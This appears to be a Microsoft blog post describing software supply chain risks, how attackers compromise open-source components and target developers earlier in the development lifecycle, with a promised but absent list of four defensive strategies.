The software supply chain is a vast, global landscape made up of a complicated web of interconnected software producers and consumers. As such, it comes with numerous risks and vulnerabilities that affect all software\u2014including those from third parties and outside vendors. These risks include everything from code vulnerabilities and open-source code repositories to hijacked software updates, insecure connected devices, overprivileged access to resources across the supply chain, and more.\n\nHowever, many software supply chain vulnerabilities occur because most software is not written from scratch. Instead, developers often rely on open-source code to scale software production. As many as 96% of applications contain at least one open-source component, and 78% of businesses report using open-source software as part of their network. And while this trend is integral in advancing business productivity, it also highlights the importance of creating a secure software supply chain.\n\nRead on to learn what steps your developers can take to better secure software production and consumption throughout the software development lifecycle (SDLC).\n\nHow software supply chain attacks are shifting left\n\nSupply chain attacks typically involve multiple components and can evolve rapidly depending on the attack vector or entry point used. Cybercriminals often start with an initial compromise in hopes of eventually impacting a downstream consumer.\n\nFor example, a threat group might instigate a software supply chain attack by compromising a popular open-source component. As developers around the world implement this new code, they unknowingly ingest a malicious or backdoored package. Attackers then use this compromise to gain privileged, persistent access into the network. From there, they can enact damage such as data or financial theft, monitoring activity within the network, disabling critical systems, and more.\n\nWe\u2019re also seeing a growing trend in which attackers are shifting left earlier on in the SDLC. This is because software supply chain attacks are primarily targeted at developers and the systems that they use. This approach can be seen in past incidents like Solorigate and 3CX.\n\nSo, what can organizations do to guard against this shift left and secure their software supply chain moving forward?\n\n4 strategies for more secure software supply chains\n\nAs attackers continue shifting left, your organization and supporting software must do the same. Ensuring a built-in security approach through the safe production and consumption of software early on in the SDLC can help organizations shift left, increasing security and limiting the risk of compromise. Following are four strategies you can use to create a more secure SDLC.\n\nWhile the software supply chain can be difficult to navigate and complex to secure, businesses can partner with leading security organizations to implement best practices and holistically safeguard their environment.\n\nFor more information on Microsoft\u2019s work to secure the software supply chain, visit the Microsoft Built-In Security website.